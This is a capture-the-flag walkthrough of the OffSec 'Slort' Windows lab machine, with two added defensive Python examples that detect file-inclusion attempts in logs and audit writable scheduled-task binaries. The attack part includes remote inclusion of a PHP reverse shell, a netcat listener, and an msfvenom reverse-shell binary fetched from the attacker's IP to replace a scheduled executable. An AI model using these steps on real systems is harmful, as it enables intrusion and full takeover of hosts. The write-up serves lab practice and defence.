
Slort Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)


1. Scanning

└─$ rustscan -a $IP -- -sV -sC -Pn

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
4443/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.224.53:4443/dashboard/
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8080/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.224.53:8080/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 47958/tcp): CLEAN (Couldn't connect)
| Check 2 (port 43822/tcp): CLEAN (Couldn't connect)
| Check 3 (port 22925/udp): CLEAN (Timeout)
| Check 4 (port 13188/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 0s
| smb2-time:
| date: 2025-09-02T12:11:10
|_ start_date: N/A

2. Enumeration

Enumerating FTP port 21

Started with anonymous and admin logins: both failed.

The banner gives the version FileZilla ftpd 0.9.41 beta. A searchsploit lookup shows nothing directly exploitable, so we can come back to this later.

Enumerating HTTP

Port 4443 Enumeration

We'll enumerate the web apps first, since they generally offer the best chances of finding vulnerabilities.

At first glance it redirects to the default XAMPP Apache page.

The phpMyAdmin page can't be accessed.

While looking through the phpinfo page, we found a user, rupert.

Using Gobuster we found a site.

Port 8080 Enumeration

It also serves the same page as 4443. Strange.

After digging a little with Gobuster, found a site:

└─$ gobuster dir --url $URL --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x txt,pdf,conf 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.224.53:8080
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,pdf,conf
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 345] [--> http://192.168.224.53:8080/img/]
/site (Status: 301) [Size: 346] [--> http://192.168.224.53:8080/site/]
/examples (Status: 503) [Size: 1060]
/licenses (Status: 403) [Size: 1205]
/dashboard (Status: 301) [Size: 351] [--> http://192.168.224.53:8080/dashboard/]
/%20 (Status: 403) [Size: 1046]
/IMG (Status: 301) [Size: 345] [--> http://192.168.224.53:8080/IMG/]
/Site (Status: 301) [Size: 346] [--> http://192.168.224.53:8080/Site/]

Narrowed down to both sites being the same; it looks like one site hosted on two ports. Looking at the URL http://192.168.224.53:4443/site/index.php?page=main.php, the page parameter is a natural candidate for a file inclusion vulnerability, so we can test for that.

On initial testing I quickly found LFI.

Let's test for RFI as well. Copy the stock web shell with cp /usr/share/webshells/php/php-reverse-shell.php ., host it on the Kali machine and try to include it through the website.

Change the required parameters, IP and port, in the script.

Hosting on the Kali machine:

└─$ sudo python3 -m http.server 80

Opening a listener on the Kali machine:

nc -nvlp 21

Successfully failed 😅, so we'll try a different reverse shell.

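From the defender's side, the inclusion attempts above leave a clear trail in the Apache access log: the page parameter of /site/index.php carrying traversal sequences, absolute paths, PHP wrappers or a remote URL. The following added example (not part of the original write-up) scans constructed combined-format log lines for exactly that pattern; the allow-list of legitimate page values is an assumption for the example.

```python
"""Flag LFI/RFI attempts against /site/index.php?page= in Apache access-log lines."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (Apache combined format); not captured from the original machine.
SAMPLE_LOG = """\
192.168.45.174 - - [02/Sep/2025:12:11:10 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.45.174 - - [02/Sep/2025:12:12:01 +0000] "GET /site/index.php?page=../../../../windows/win.ini HTTP/1.1" 200 403 "-" "Mozilla/5.0"
192.168.45.174 - - [02/Sep/2025:12:13:44 +0000] "GET /site/index.php?page=http://192.168.45.174/rev2.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.45.174 - - [02/Sep/2025:12:14:02 +0000] "GET /site/index.php?page=%2e%2e%2f%2e%2e%2fxampp%2fphp%2fphp.ini HTTP/1.1" 200 9123 "-" "curl/8.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumed allow-list: the only values the application legitimately includes.
ALLOWED_PAGES = {"main.php", "about.php", "contact.php"}
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "data"}   # fetch code from elsewhere
LOCAL_WRAPPERS = {"php", "file", "phar", "zip"}             # read/execute local content


def classify_page_value(value: str) -> Optional[str]:
    """Return 'RFI', 'LFI' or None for one page= value (already URL-decoded once)."""
    v = unquote(value).replace("\\", "/")          # undo double encoding, normalise slashes
    scheme = re.match(r"^([a-z][a-z0-9+.-]*):", v, re.I)
    if scheme and scheme.group(1).lower() in REMOTE_SCHEMES:
        return "RFI"
    if scheme and scheme.group(1).lower() in LOCAL_WRAPPERS:
        return "LFI"
    if "../" in v or v.startswith("/") or re.match(r"^[a-z]:/", v, re.I):
        return "LFI"                                # traversal, absolute path or drive letter
    return None if v in ALLOWED_PAGES else "LFI"   # anything off the allow-list is suspect


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client ip, kind, page value) for every inclusion-looking request."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/site/index.php"):
            continue
        for value in parse_qs(parts.query).get("page", []):
            kind = classify_page_value(value)
            if kind:
                hits.append((m.group("ip"), kind, value))
    return hits
```

Run over the sample, the first request is clean and the remaining three are reported as LFI, RFI and LFI respectively, the last one despite its percent-encoding.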

Initial access

After some failures I found a PhpReverseShell.php that worked.

Modify the necessary parts after downloading the script.

Host it on your Kali machine using:

└─$ sudo python3 -m http.server 80

Then call it from the website; I renamed the file to rev2.php.

It gets downloaded by the target system,

and we get a shell from the Windows machine.

Privilege Escalation

Quickly ran winPEAS and started looking through the results. A TFTP entry caught my attention.

Went into the backup folder and did some investigation.

Found that this EXE runs every 5 minutes to take a backup, and I have full access over it.

Let's try to replace it with a reverse shell and wait for it to execute.

Used msfvenom to generate a malicious binary:

└─$ msfvenom --payload windows/x64/shell_reverse_tcp LHOST=192.168.45.174 LPORT=9000 -f exe > TFTP.EXE 

And downloaded it into the folder:

PS C:\Backup> iwr -uri http://192.168.45.174/TFTP.EXE -Outfile TFTP.EXE

It got executed and we got a shell as Administrator.

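The root cause here is a scheduled binary that low-privilege users can overwrite. An administrator can catch this before an attacker does by checking the ACL of every binary a scheduled task runs. The following added example (not part of the original write-up) parses icacls-style output for such binaries and reports principals any local user can act as that hold write-class rights; the output is constructed for the example, since the write-up shows no icacls listing.

```python
"""Audit scheduled-task binaries for ACEs that let non-admin users replace them."""
import re
from typing import Dict, List, Set, Tuple

# Principals every local user effectively belongs to (lower-cased for comparison).
LOW_PRIV_PRINCIPALS = {"everyone", "builtin\\users",
                       "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls rights that allow changing the file content, its DACL or its owner.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}
FLAGS = {"I", "OI", "CI", "IO", "NP", "DENY"}   # inheritance flags, not rights

# Constructed icacls output for two binaries (not captured from the original machine).
SAMPLE_ACLS = {
    r"C:\Backup\TFTP.EXE": (
        r"C:\Backup\TFTP.EXE BUILTIN\Administrators:(I)(F)" "\n"
        r"                   NT AUTHORITY\SYSTEM:(I)(F)" "\n"
        r"                   BUILTIN\Users:(I)(F)" "\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n"
    ),
    r"C:\Windows\System32\cmd.exe": (
        r"C:\Windows\System32\cmd.exe NT SERVICE\TrustedInstaller:(F)" "\n"
        r"                            BUILTIN\Administrators:(RX)" "\n"
        r"                            BUILTIN\Users:(RX)" "\n"
    ),
}


def parse_icacls(output: str, path: str) -> List[Tuple[str, Set[str], bool]]:
    """Return (principal, rights, is_deny) for each ACE in icacls output for one path."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):      # first line carries the path
            line = line[len(path):].strip()
        if ":" not in line or line.startswith("Successfully"):
            continue
        who, rights = line.rsplit(":", 1)              # rights hold no ':', names may hold spaces
        tokens = [t for grp in re.findall(r"\(([^)]*)\)", rights) for t in grp.split(",")]
        aces.append((who.strip(), {t for t in tokens if t not in FLAGS}, "DENY" in tokens))
    return aces


def low_priv_writers(output: str, path: str) -> List[str]:
    """Low-privilege principals holding an allow ACE with write-class rights on the file."""
    aces = parse_icacls(output, path)
    denied = {who.lower() for who, rights, deny in aces if deny and rights & WRITE_RIGHTS}
    return sorted({who for who, rights, deny in aces
                   if not deny and who.lower() in LOW_PRIV_PRINCIPALS
                   and rights & WRITE_RIGHTS and who.lower() not in denied})


def audit_task_binaries(acls: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each task binary to the principals that could replace it (empty list = fine)."""
    return {path: low_priv_writers(out, path) for path, out in acls.items()}
```

On the sample, C:\Backup\TFTP.EXE is flagged because BUILTIN\Users holds (F), which is precisely the condition the privilege escalation above relied on, while cmd.exe, readable but not writable by users, passes.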